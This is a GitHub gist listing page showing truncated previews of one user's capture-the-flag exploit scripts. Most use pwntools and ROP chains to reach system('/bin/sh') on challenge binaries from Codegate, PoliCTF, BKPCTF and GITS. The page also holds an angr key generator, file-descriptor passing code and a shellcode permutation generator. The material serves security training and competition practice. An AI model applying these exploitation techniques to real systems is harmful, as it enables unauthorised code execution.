Skip to content

Instantly share code, notes, and snippets.

View kokjo's full-sized avatar

Jonas Rudloff kokjo

View GitHub Profile
@kokjo
kokjo / doit_serial.py
Created March 20, 2016 15:47
Exploit for serial from Codegate quals 2016
from pwn import *
e = ELF("./serial")
#r = remote("175.119.158.133", 23232)
r = process("./serial")
r.recvuntil("input product key:")
r.sendline("615066814080")
@kokjo
kokjo / gen_serial.py
Created March 20, 2016 15:16
Product key generator for the serial task form Codegate Quals 2016
import angr
p = angr.Project("./serial")
s = p.factory.blank_state(addr = 0x400CBB )
serial = s.se.BVS("serial", 32*8)
s.memory.store(0x6020BA, serial) # store some symbolic memory in the bss
s.regs.rdi = 0x6020BA # let the first arguemnt(rdi) point to it
pg = p.factory.path_group(s)
@kokjo
kokjo / recvfd.c
Last active April 14, 2024 06:07
Receive a file descriptor over a abstract unix domain socket.
// compile with gcc -static -o recvfd recvfd.c
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <strings.h>
static int recv_fd(int sock){
// This function does the arcane magic recving
// file descriptors over unix domain sockets
struct msghdr msg;
@kokjo
kokjo / sendfd.c
Last active April 16, 2024 10:27
Send a file descriptor over an abstract unix domain socket
// compile with: gcc -static -o sendfd sendfd.c
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <strings.h>
int send_fd(int sock, int fd){
// This function does the arcane magic for sending
// file descriptors over unix domain sockets
struct msghdr msg;
@kokjo
kokjo / doit.py
Created July 14, 2015 09:06
Solution for johns-shufle from polictf 2015
from pwn import *
e = ELF("./johns-shuffle")
rop = ROP(e)
command = "/bin/sh"
# Bypass the shuffling by forcing the dynamic linker to lookup the symbols again
rop.call(e.plt["read"]+6, [0, e.bss(), len(command)+1])
rop.call(e.plt["system"]+6, [e.bss()])
#include <stdio.h>
int main(int argc, char **argv){
long int a=0,b=0,c=0,d=0;
scanf("0x%lx 0x%lx", &a, &b);
scanf("0x%lx 0x%lx", &c, &d);
printf("a: 0x%x b: 0x%x c: 0x%x d: 0x%x\n", a,b,c,d);
}
@kokjo
kokjo / doit_drunk.py
Created March 24, 2015 10:10
Solution for drunk from bcft
from pwn import *
from ctypes import sizeof
ed = elf.datatypes
r = remote("146.148.79.13", 55173)
r.sendline(str(3338240).ljust(80, "\x00")+p32(0x401000))
r.recvrepeat(1)
@MemLeak
def leak(addr):
@kokjo
kokjo / doit_jfk.py
Created March 1, 2015 20:01
Solution for jfk from bkpctf
from pwn import *
s = ssh("jfk", "54.152.92.112", password="jfk")
r = s.shell(tty=False)
r.recvuntil("\x00/ $ ")
log.info("VM has booted")
r.sendline("cd /home/supershm")
r.recvuntil("~ $ ")
@kokjo
kokjo / doit_boxxy.py
Created January 18, 2015 21:33
Solution of boxxy from GITS2015
from pwn import *
context(arch = 'i386', os = 'linux')
elf = ELF('boxxy')
rop = ROP(elf)
libc = ELF("libc.so.6")
libc_rop = ROP(libc)
HOST = 'localhost'
@kokjo
kokjo / generate.py
Created January 2, 2015 22:15
proof-of-concept shellcode permutation generator
from random import sample, choice
def parse(text):
parts = {}
deps = {}
lines = text.strip().split("\n")
for line in lines:
lineid, linedeps, content = line.split(";", 2)
lineid = lineid.strip()
linedeps = map(lambda dep: dep.strip(), linedeps.strip().split(","))